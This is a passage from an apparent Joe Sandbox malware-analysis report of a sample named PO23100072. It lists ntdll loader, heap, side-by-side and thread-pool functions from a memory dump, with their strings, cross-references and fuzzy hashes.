                                                                • Opcode ID: 79361569d3b3ec22c7c746b0cc041bcdf7b86f73da55cc01b31e9fa18623a4c0
                                                                • Instruction ID: 364d9d1f0641d17039d6551c71febc1b4acacf259418f9ecdf1ff633e49260e3
                                                                • Opcode Fuzzy Hash: 79361569d3b3ec22c7c746b0cc041bcdf7b86f73da55cc01b31e9fa18623a4c0
                                                                • Instruction Fuzzy Hash: 8A915C71B403159BEB35DF58D848BAEBBB5BB40B24F180129FA01A7289D7744B41CBD1
                                                                Function 0179645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 017F9A2A
                                                                • apphelp.dll, xrefs: 01796496
                                                                • Getting the shim engine exports failed with status 0x%08lx, xrefs: 017F9A01
                                                                • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 017F99ED
                                                                • minkernel\ntdll\ldrinit.c, xrefs: 017F9A11, 017F9A3A
                                                                • LdrpInitShimEngine, xrefs: 017F99F4, 017F9A07, 017F9A30
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1660923291.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_1770000_PO23100072.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                • API String ID: 0-204845295
                                                                • Opcode ID: 8df74b2bb7350d07e0666e991c4b7db117afc9424b8afa64b7fcbcf70c94a6f9
                                                                • Instruction ID: 2b4994b7621936471a9f91e32675e67dc876b61253dac830753d33a829657812
                                                                • Opcode Fuzzy Hash: 8df74b2bb7350d07e0666e991c4b7db117afc9424b8afa64b7fcbcf70c94a6f9
                                                                • Instruction Fuzzy Hash: 5251B2712483019FEB25DF24D895B9BF7E4FF84748F14091DFA8597265E630EA08CB92
                                                                Function 017D2674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 018121BF
                                                                • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01812180
                                                                • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0181219F
                                                                • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01812178
                                                                • SXS: %s() passed the empty activation context, xrefs: 01812165
                                                                • RtlGetAssemblyStorageRoot, xrefs: 01812160, 0181219A, 018121BA
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1660923291.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_1770000_PO23100072.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                • API String ID: 0-861424205
                                                                • Opcode ID: d632fb744078241de71e70ab12834ba7790d1c2dcc2582e67cfb70fbd03b1913
                                                                • Instruction ID: 2667dae5321faeaf1b90dbdbbd6d15954921ab9c0823a39e3cbbd7adae10a5df
                                                                • Opcode Fuzzy Hash: d632fb744078241de71e70ab12834ba7790d1c2dcc2582e67cfb70fbd03b1913
                                                                • Instruction Fuzzy Hash: ED313576F802297BEB21DA998C81F5AFB7DDF65B50F250059FB05EB105D270AB01C3A1
                                                                Function 017DC6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                • Loading import redirection DLL: '%wZ', xrefs: 01818170
                                                                • LdrpInitializeImportRedirection, xrefs: 01818177, 018181EB
                                                                • minkernel\ntdll\ldrredirect.c, xrefs: 01818181, 018181F5
                                                                • LdrpInitializeProcess, xrefs: 017DC6C4
                                                                • Unable to build import redirection Table, Status = 0x%x, xrefs: 018181E5
                                                                • minkernel\ntdll\ldrinit.c, xrefs: 017DC6C3
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1660923291.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_1770000_PO23100072.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                • API String ID: 0-475462383
                                                                • Opcode ID: 5114eec50e239e8a8d000d00e07f69ebbe7895b0041cf688b994034da0d95559
                                                                • Instruction ID: f6997fc0e2f137ebe38b47aef82d6781814bd5dff79401570e42a0f2db679e18
                                                                • Opcode Fuzzy Hash: 5114eec50e239e8a8d000d00e07f69ebbe7895b0041cf688b994034da0d95559
                                                                • Instruction Fuzzy Hash: 5F3117B26443469FC215EF2CDC4AE1AF7E4EF94B10F04055CF9459B299E620EE04C7A2
                                                                Function 017E096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 017E2DF0: LdrInitializeThunk.NTDLL ref: 017E2DFA
                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 017E0BA3
                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 017E0BB6
                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 017E0D60
                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 017E0D74
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1660923291.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_1770000_PO23100072.jbxd
                                                                Similarity
                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                • String ID:
                                                                • API String ID: 1404860816-0
                                                                • Opcode ID: f9463549ef92185ede80c7e1df5c0b32f7e8da2fde19c92428392fcfb1208496
                                                                • Instruction ID: 77b3c1892c847f0c2f12c6844d2774c1c80d72de7009a155def703c35c1fd953
                                                                • Opcode Fuzzy Hash: f9463549ef92185ede80c7e1df5c0b32f7e8da2fde19c92428392fcfb1208496
                                                                • Instruction Fuzzy Hash: FE426D72A00715DFDB21CF28C894BAAB7F9FF08314F1445A9E989DB245D770AA84CF60
                                                                Function 017AA3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1660923291.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_1770000_PO23100072.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                • API String ID: 0-379654539
                                                                • Opcode ID: 660de2818804d0e3a2fc607099bd89a6cff5c22638d1e4c8c5f6551bc2a501c5
                                                                • Instruction ID: 54aaf231e38e0a351435c35b25a278ac7f5225bba743e9fb5c22e4c504b0a20f
                                                                • Opcode Fuzzy Hash: 660de2818804d0e3a2fc607099bd89a6cff5c22638d1e4c8c5f6551bc2a501c5
                                                                • Instruction Fuzzy Hash: 5EC18970108386CFD722CF58C444B6ABBE4BF84704F448A6AF995CB291E774CA49CB56
                                                                Function 017D8402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 017D855E
                                                                • LdrpInitializeProcess, xrefs: 017D8422
                                                                • @, xrefs: 017D8591
                                                                • minkernel\ntdll\ldrinit.c, xrefs: 017D8421
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1660923291.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_1770000_PO23100072.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                • API String ID: 0-1918872054
                                                                • Opcode ID: 4805b29094f017f8da28ad4f86105c0e526c04478e92e3d4ffd261c9fdbad546
                                                                • Instruction ID: 6ec6246460fb5a6fada40ab8b3c37fde6894f4bf332429c5d9b9a835b9bc28bb
                                                                • Opcode Fuzzy Hash: 4805b29094f017f8da28ad4f86105c0e526c04478e92e3d4ffd261c9fdbad546
                                                                • Instruction Fuzzy Hash: 59917D71508349AFDB22DF65CC44FABFAECBB88744F84092EF685D6155E370DA048B62
                                                                Function 017D273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 018121D9, 018122B1
                                                                • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 018122B6
                                                                • SXS: %s() passed the empty activation context, xrefs: 018121DE
                                                                • .Local, xrefs: 017D28D8
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1660923291.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_1770000_PO23100072.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                • API String ID: 0-1239276146
                                                                • Opcode ID: 91c28e2e759cda5b569ba2a1f752b4a323173bd178abedf8e0d12165edb6ee21
                                                                • Instruction ID: 4f97195c9fc8651cebf8d861fe21d884024ee1c5286d67f284f5674370681cf4
                                                                • Opcode Fuzzy Hash: 91c28e2e759cda5b569ba2a1f752b4a323173bd178abedf8e0d12165edb6ee21
                                                                • Instruction Fuzzy Hash: E6A1C03194122DDFDB25CF68C888BA9F7B5BF58314F2401E9D908AB256D7309E81CF90
                                                                Function 017D4AD0 Relevance: 5.2, Strings: 4, Instructions: 228COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01813456
                                                                • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01813437
                                                                • RtlDeactivateActivationContext, xrefs: 01813425, 01813432, 01813451
                                                                • SXS: %s() called with invalid flags 0x%08lx, xrefs: 0181342A
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1660923291.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_1770000_PO23100072.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                                • API String ID: 0-1245972979
                                                                • Opcode ID: 44fe8e271359f3b9e23f213a9400fa490d375886f7bdef555ccbd332825eb700
                                                                • Instruction ID: f827aaa253511f07f5cc9b38aaee6bba9dc7ff6af19dcea924307b7d8ac94e08
                                                                • Opcode Fuzzy Hash: 44fe8e271359f3b9e23f213a9400fa490d375886f7bdef555ccbd332825eb700
                                                                • Instruction Fuzzy Hash: 176124726807169BD722CF1CC881B2AF7F5BFA4B20F148519E95ADB644D730E941CB91
                                                                Function 017A64AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01800FE5
                                                                • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01801028
                                                                • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0180106B
                                                                • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 018010AE
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1660923291.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_1770000_PO23100072.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                • API String ID: 0-1468400865
                                                                • Opcode ID: 42431324ea6695420e2989135e2151e483dcb75beaba0c8c0168d8be2ec0a473
                                                                • Instruction ID: 7c2dfa66eff94d1b5470e780fa78d6fbd5856dd6ffbe67510d604925c53b3877
                                                                • Opcode Fuzzy Hash: 42431324ea6695420e2989135e2151e483dcb75beaba0c8c0168d8be2ec0a473
                                                                • Instruction Fuzzy Hash: C271C3B19043059FCB21DF14C888B97BFE8EF95764F540569F9888B28AD734D688CBD2
                                                                Function 017C245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0180A992
                                                                • apphelp.dll, xrefs: 017C2462
                                                                • LdrpDynamicShimModule, xrefs: 0180A998
                                                                • minkernel\ntdll\ldrinit.c, xrefs: 0180A9A2
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1660923291.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_1770000_PO23100072.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                • API String ID: 0-176724104
                                                                • Opcode ID: 1836759d7ec87bebdc92d93b1b5ce7f0560309a7fb7cef96cb8869f257802dd9
                                                                • Instruction ID: 65cee056b2066928d82769b987613b0d3d33d695c8ffef7258e9a05a6f5d972e
                                                                • Opcode Fuzzy Hash: 1836759d7ec87bebdc92d93b1b5ce7f0560309a7fb7cef96cb8869f257802dd9
                                                                • Instruction Fuzzy Hash: 0B312772700305ABDB369F6D9D85A7AB7B5FB80B04F29005DE910EB299D7705B82CB80
                                                                Function 017B29A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 017B327D
                                                                • HEAP[%wZ]: , xrefs: 017B3255
                                                                • HEAP: , xrefs: 017B3264
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1660923291.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_1770000_PO23100072.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                • API String ID: 0-617086771
                                                                • Opcode ID: 16dc682f4d2ee67e52a6bb5a24a578ca7dd555d83f7b3c3cbc0e359aba17dc6d
                                                                • Instruction ID: 114ac5d1014d6d2fd51be5f960bc4d271419f2ce705a0e88e9c81ced2bce6c37
                                                                • Opcode Fuzzy Hash: 16dc682f4d2ee67e52a6bb5a24a578ca7dd555d83f7b3c3cbc0e359aba17dc6d
                                                                • Instruction Fuzzy Hash: F1929971A056499FEB25CF68C484BEEFBF1FF48304F188099E859AB352D734A985CB50
                                                                Function 017B0770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1660923291.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_1770000_PO23100072.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                • API String ID: 0-4253913091
                                                                • Opcode ID: 24d50d3dfe758391640b4acea3a71b3aa78b3169d22b228498c02cb757a019be
                                                                • Instruction ID: 3f3996ded880afc01c262e04e5cee863ba4d9cb064f5ea5ec26da780ab3128a9
                                                                • Opcode Fuzzy Hash: 24d50d3dfe758391640b4acea3a71b3aa78b3169d22b228498c02cb757a019be
                                                                • Instruction Fuzzy Hash: 04F17B7060060ADFEB26CF68C894BAAF7B5FF44304F1441A9E516DB391D734AA81CFA1
                                                                Function 017C6962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1660923291.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_1770000_PO23100072.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: $@
                                                                • API String ID: 0-1077428164
                                                                • Opcode ID: 70c9501eb635ed5d2eef33731bf65b3c56e701169e99d3c1a26974bcb5fa1e09
                                                                • Instruction ID: db0707ec75cb0474648c57400a13013647d83ae859605bd890c0634074a79e99
                                                                • Opcode Fuzzy Hash: 70c9501eb635ed5d2eef33731bf65b3c56e701169e99d3c1a26974bcb5fa1e09
                                                                • Instruction Fuzzy Hash: E6C290716083459FE769CF28C881BABFBE5AF88B14F04896DF989C7241DB34D944CB52
                                                                Function 0179A197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1660923291.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_1770000_PO23100072.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: FilterFullPath$UseFilter$\??\
                                                                • API String ID: 0-2779062949
                                                                • Opcode ID: 97e4e7e7379262eeb8cff11c63078b1cb7e05f461d1ac563fd52151afba5f523
                                                                • Instruction ID: 7d9f31a89f7b89aeaaaf4388369b03823759dc53d1df58ea0e69746753f3fa86
                                                                • Opcode Fuzzy Hash: 97e4e7e7379262eeb8cff11c63078b1cb7e05f461d1ac563fd52151afba5f523
                                                                • Instruction Fuzzy Hash: 57A14A759116299BDF329B68CC88BAAF7B8EF48710F1001E9EA09A7251D7359E84CF50
                                                                Function 017C0BCB Relevance: 4.0, Strings: 3, Instructions: 210COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                • Failed to allocated memory for shimmed module list, xrefs: 0180A10F
                                                                • minkernel\ntdll\ldrinit.c, xrefs: 0180A121
                                                                • LdrpCheckModule, xrefs: 0180A117
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1660923291.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_1770000_PO23100072.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                • API String ID: 0-161242083
                                                                • Opcode ID: b54eb3421b3a0df75b2ec7ed461942374df49d9a9a0e005fd34bd210693f3fdc
                                                                • Instruction ID: c0f141cecd5a7ec74cc0d1f0bc4d602f08999daa9e16230af325f2f954067b4d
                                                                • Opcode Fuzzy Hash: b54eb3421b3a0df75b2ec7ed461942374df49d9a9a0e005fd34bd210693f3fdc
                                                                • Instruction Fuzzy Hash: 38719E75A00209DFDB2ADF68C985ABEF7F4FB44704F18406DE912EB255E734AA41CB90
                                                                Function 017B0A5B Relevance: 3.9, Strings: 3, Instructions: 190COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1660923291.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_1770000_PO23100072.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                • API String ID: 0-1334570610
                                                                • Opcode ID: 44147ca5563ebd76c120552d636d8a613f08ba5623473f57d27964ec0595ac6d
                                                                • Instruction ID: e2e80ba0867003d9a3af703f4812f989f7b952425e9f15f0da59700d005ab3d6
                                                                • Opcode Fuzzy Hash: 44147ca5563ebd76c120552d636d8a613f08ba5623473f57d27964ec0595ac6d
                                                                • Instruction Fuzzy Hash: F361AB716003059FDB29CF28C884BABFBB1FF45704F15859AE449CB292D770E981CB91
                                                                Function 017DC720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                • LdrpInitializePerUserWindowsDirectory, xrefs: 018182DE
                                                                • Failed to reallocate the system dirs string !, xrefs: 018182D7
                                                                • minkernel\ntdll\ldrinit.c, xrefs: 018182E8
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1660923291.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_1770000_PO23100072.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                • API String ID: 0-1783798831
                                                                • Opcode ID: 05a14882493560adde4f671eb49abee18977e27c928243928f52b98de96ceeb6
                                                                • Instruction ID: b87413ee3b8bd93655c1830a29b9edae4c492469d0ea60f01504acc292a04135
                                                                • Opcode Fuzzy Hash: 05a14882493560adde4f671eb49abee18977e27c928243928f52b98de96ceeb6
                                                                • Instruction Fuzzy Hash: C94125B2541305ABC722EB68DC89B5BB7F8AF48720F19092EF955C3258E770D900CBD1
                                                                Function 0185C188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                • @, xrefs: 0185C1F1
                                                                • PreferredUILanguages, xrefs: 0185C212
                                                                • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0185C1C5
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1660923291.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_1770000_PO23100072.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                • API String ID: 0-2968386058
                                                                • Opcode ID: db87d6dc4b53afac7f0f10706b11c36a9011abb110334b19768aaaa78fc24431
                                                                • Instruction ID: fdef3bdb83965e3a5db392fe3fdfcf626b9385d07723b3fe6b77b9f90721a755
                                                                • Opcode Fuzzy Hash: db87d6dc4b53afac7f0f10706b11c36a9011abb110334b19768aaaa78fc24431
                                                                • Instruction Fuzzy Hash: 3D414F75A00209ABDF51DAD8C895BEEFBBCEB14744F14406AEA09F7284D7749A448F90
                                                                Function 01834144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1660923291.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_1770000_PO23100072.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                • API String ID: 0-1373925480
                                                                • Opcode ID: f8439bf11a5c253ec0a045d0612daf6b6c660ee3593e2f4b51cb0ce2d2d11fa4
                                                                • Instruction ID: 6b6053061c039eec3f4e128d070b8199b29d6c8a53a199562ea4480c5d809fb3
                                                                • Opcode Fuzzy Hash: f8439bf11a5c253ec0a045d0612daf6b6c660ee3593e2f4b51cb0ce2d2d11fa4
                                                                • Instruction Fuzzy Hash: 3F412631A00A58CBEB26DFD8C844BADBBB8FF95344F180459D901FB791D7748A41CB90
                                                                Function 01824755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                • LdrpCheckRedirection, xrefs: 0182488F
                                                                • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01824888
                                                                • minkernel\ntdll\ldrredirect.c, xrefs: 01824899
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1660923291.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_1770000_PO23100072.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                • API String ID: 0-3154609507
                                                                • Opcode ID: 7b0d25a13636c6a366fb5e92bba212097d218741eab4ed04ccaf9d47da370144
                                                                • Instruction ID: 41d53f930765fbe951db4198f86b73259493aed621d9725720733f8b19d922f6
                                                                • Opcode Fuzzy Hash: 7b0d25a13636c6a366fb5e92bba212097d218741eab4ed04ccaf9d47da370144
                                                                • Instruction Fuzzy Hash: C441D072A102759FCB23CE6CD840A26BBE4BF49B50F060269ED58D7311D770DA80CBA1
                                                                Function 017B0BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1660923291.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_1770000_PO23100072.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                • API String ID: 0-2558761708
                                                                • Opcode ID: 97fdcd5c099f568493abfc82be72c135dfc62a2a8753803b533ebe45edf54e5a
                                                                • Instruction ID: 3c763fe673eaabd453c88562c3eda205688897da9d3ffc08dcdd715f5078d7bd
                                                                • Opcode Fuzzy Hash: 97fdcd5c099f568493abfc82be72c135dfc62a2a8753803b533ebe45edf54e5a
                                                                • Instruction Fuzzy Hash: C711DE7131450ACFDB6ACB18D8D4BABF3A4AF40B15F198159F006CB291DB30D940CB61
                                                                Function 018220DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                • LdrpInitializationFailure, xrefs: 018220FA
                                                                • Process initialization failed with status 0x%08lx, xrefs: 018220F3
                                                                • minkernel\ntdll\ldrinit.c, xrefs: 01822104
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1660923291.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_1770000_PO23100072.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                • API String ID: 0-2986994758
                                                                • Opcode ID: 3e8caad0a20bef838692cd77537274fe8f954214c7c8820bcd4b9a92cede8d01
                                                                • Instruction ID: aa50c96267b2bac563a35ee17b113a3db54e1352fa5120a166370d33eba1a873
                                                                • Opcode Fuzzy Hash: 3e8caad0a20bef838692cd77537274fe8f954214c7c8820bcd4b9a92cede8d01
                                                                • Instruction Fuzzy Hash: 60F0F675680718BBEB25EB4CCC56F9977ADFB40B54F240069FA00F7285D6B0AB40CA91
                                                                Function 017B03E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1660923291.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                Joe Sandbox IDA Plugin
